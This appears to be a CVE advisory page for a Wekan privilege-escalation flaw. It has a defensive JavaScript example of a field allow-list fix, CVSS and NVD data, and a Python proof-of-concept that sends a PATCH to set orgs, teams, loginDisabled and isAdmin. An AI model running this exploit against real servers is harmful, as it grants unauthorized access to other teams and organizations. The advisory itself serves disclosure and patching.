Security Vulnerability Report
CVE-2025-65780 CVSS 8.8 HIGH

CVE-2025-65780

Published: 2025-12-15 14:15:57
Last Modified: 2025-12-18 01:37:11

Description

An issue was discovered in Wekan The Open Source kanban board system up to version 18.15, fixed in 18.16. Authenticated users can update their entire user document (beyond profile fields), including orgs/teams and loginDisabled, due to missing server-side authorization checks; this enables privilege escalation and unauthorized access to other teams/orgs.
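To make the missing check concrete, the following is an added example, written for this page in JavaScript; it is not Wekan's code and not the patched commit. It models a Meteor-style collection update allow rule in the shape Meteor actually uses, update(userId, doc, fieldNames, modifier), and contrasts an ownership-only rule with one that also allow-lists the top-level fields a user may touch on their own document. The allow-list contents, the sample user document, the modifiers and the helper names (topLevelFields, applyUpdate, demo) are this example's own assumptions.

```javascript
// Added example (not Wekan's code): ownership-only allow rule vs. a
// field-restricted one, evaluated by a tiny server-side update gate.

// Assumption: an ordinary user may only edit their own `profile` subtree.
const SELF_EDITABLE_FIELDS = new Set(["profile"]);

// Meteor hands allow rules the top-level keys the modifier touches; this
// helper derives them the same way ("profile.fullname" -> "profile").
// Only operator-style modifiers ($set, $unset, ...) are modelled here.
function topLevelFields(modifier) {
  const fields = new Set();
  for (const op of Object.keys(modifier)) {
    if (!op.startsWith("$")) {
      throw new Error("only operator-style modifiers are supported");
    }
    for (const path of Object.keys(modifier[op])) {
      fields.add(path.split(".")[0]);
    }
  }
  return [...fields];
}

// Vulnerable rule: checks ownership only. Any field on the caller's own
// document (orgs, teams, loginDisabled, ...) gets through.
function allowUpdateVulnerable(userId, doc, fieldNames, modifier) {
  return doc._id === userId;
}

// Hardened rule: ownership AND every touched top-level field is allow-listed.
function allowUpdateHardened(userId, doc, fieldNames, modifier) {
  if (doc._id !== userId) return false;
  return fieldNames.every((f) => SELF_EDITABLE_FIELDS.has(f));
}

// Server-side gate: run the rule, then apply a $set to a copy of the doc.
// Returns { ok, doc }; the original document is never mutated.
function applyUpdate(rule, userId, doc, modifier) {
  const fieldNames = topLevelFields(modifier);
  if (!rule(userId, doc, fieldNames, modifier)) {
    return { ok: false, doc };
  }
  const updated = JSON.parse(JSON.stringify(doc));
  for (const [path, value] of Object.entries(modifier.$set || {})) {
    const parts = path.split(".");
    let cur = updated;
    for (const p of parts.slice(0, -1)) {
      if (typeof cur[p] !== "object" || cur[p] === null) cur[p] = {};
      cur = cur[p];
    }
    cur[parts[parts.length - 1]] = value;
  }
  return { ok: true, doc: updated };
}

// Constructed sample data: a low-privilege, login-locked user and the kind
// of modifier the advisory describes (fields outside `profile`).
const sampleUser = {
  _id: "u1",
  profile: { fullname: "Low Priv" },
  orgs: [],
  teams: [],
  loginDisabled: true,
};
const escalation = {
  $set: { orgs: ["org-admin"], teams: ["team-admin"], loginDisabled: false },
};
const profileEdit = { $set: { "profile.fullname": "New Name" } };

function demo() {
  const v = applyUpdate(allowUpdateVulnerable, "u1", sampleUser, escalation);
  const h = applyUpdate(allowUpdateHardened, "u1", sampleUser, escalation);
  const p = applyUpdate(allowUpdateHardened, "u1", sampleUser, profileEdit);
  const other = applyUpdate(allowUpdateVulnerable, "u2", sampleUser, profileEdit);
  return {
    vulnerableAccepted: v.ok,        // true: lock cleared, orgs/teams joined
    hardenedAccepted: h.ok,          // false: non-profile fields rejected
    profileEditAccepted: p.ok,       // true: legitimate self-edit still works
    otherUserBlocked: !other.ok,     // true: even the weak rule stops cross-user edits
    vulnerableDoc: v.doc,
  };
}

console.log(demo());
```

The point of the fieldNames check is that the ownership test alone answers the wrong question ("is this my document?") when the real question is "may this caller set this field?"; the hardened rule answers both, and anything outside the allow-list has to go through a dedicated server method that performs its own authorization.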

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wekan_project:wekan:*:*:*:*:*:*:*:* - VULNERABLE
Wekan < 18.16, i.e. Wekan <= 18.15 (affected versions, per the NVD description)
Note: the CPE match in the raw NVD data below gives versionEndExcluding "8.16", and the release-notes reference points at the v8.16 changelog entry dated 2025-11-02, while the description says 18.15/18.16. Confirm the fixed version against the vendor advisory and the linked patch commit before scoping an upgrade.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-65780 PoC - Wekan privilege escalation via missing authorization
# Affected: Wekan <= 18.15 (per the NVD description; see the version caveat above)
# Demonstrates how an authenticated low-privilege user submits an update to
# their own user document that touches fields outside `profile`.
#
# Caveat: the login endpoint, the PATCH route and the JSON shapes below are
# the PoC's own assumptions and are not verified against Wekan's documented
# REST API. Check them against the target before relying on this script.
import sys

import requests

TARGET_URL = "https://your-wekan-instance.com"
ATTACKER_USERNAME = "[email protected]"
ATTACKER_PASSWORD = "password123"
TIMEOUT = 15  # seconds; avoids hanging on an unresponsive host


def get_auth_token():
    """Authenticate and return (token, user_id), or (None, None) on failure."""
    login_url = f"{TARGET_URL}/api/v1/login"
    payload = {
        "user": {"username": ATTACKER_USERNAME},
        "password": ATTACKER_PASSWORD,
    }
    response = requests.post(login_url, json=payload, timeout=TIMEOUT)
    if response.status_code == 200:
        data = response.json()
        return data.get("token"), data.get("userId")
    return None, None


def escalate_privilege(token, user_id):
    """Send an update that sets fields beyond `profile` on the caller's own user document."""
    update_url = f"{TARGET_URL}/api/v1/users/{user_id}"
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json",
    }
    # Everything outside `profile` is what the missing server-side check
    # should have rejected.
    malicious_payload = {
        "profile": {"invalid2": "test"},
        "orgs": ["admin-org"],     # join an organization the user is not a member of
        "teams": ["admin-team"],   # join a team the user is not a member of
        "loginDisabled": False,    # clear an admin-imposed login lock
        "isAdmin": True,           # attempt to gain admin privileges
    }
    response = requests.patch(
        update_url, headers=headers, json=malicious_payload, timeout=TIMEOUT
    )
    return response.status_code, response.text


def main():
    print("[*] CVE-2025-65780 Wekan privilege escalation PoC")
    token, user_id = get_auth_token()
    if not token:
        print("[-] Authentication failed")
        sys.exit(1)
    print(f"[+] Authenticated as user: {user_id}")
    status, body = escalate_privilege(token, user_id)
    if status == 200:
        # A 200 alone does not prove the fields changed; re-read the user
        # document and confirm orgs/teams/loginDisabled before calling it a success.
        print("[+] Server accepted the update; verify the user document actually changed")
        print(f"[+] Response: {body}")
    else:
        print(f"[-] Update rejected with status {status}")


if __name__ == "__main__":
    main()

References

https://github.com/wekan/wekan (Product)
https://github.com/wekan/wekan/blob/main/CHANGELOG.md#v816-2025-11-02-wekan--release (Release Notes)
https://github.com/wekan/wekan/commit/f26d58201855e861bab1cd1fda4d62c664efdb81 (Patch)
https://wekan.fi/hall-of-fame/spacebleed/ (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65780", "sourceIdentifier": "[email protected]", "published": "2025-12-15T14:15:57.450", "lastModified": "2025-12-18T01:37:10.793", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Wekan The Open Source kanban board system up to version 18.15, fixed in 18.16. Authenticated users can update their entire user document (beyond profile fields), including orgs/teams and loginDisabled, due to missing server-side authorization checks; this enables privilege escalation and unauthorized access to other teams/orgs."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wekan_project:wekan:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.16", "matchCriteriaId": "F031B735-9703-4B9D-BDE9-CC4226B5EBD0"}]}]}], "references": [{"url": 
"https://github.com/wekan/wekan", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/wekan/wekan/blob/main/CHANGELOG.md#v816-2025-11-02-wekan--release", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/wekan/wekan/commit/f26d58201855e861bab1cd1fda4d62c664efdb81", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://wekan.fi/hall-of-fame/spacebleed/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}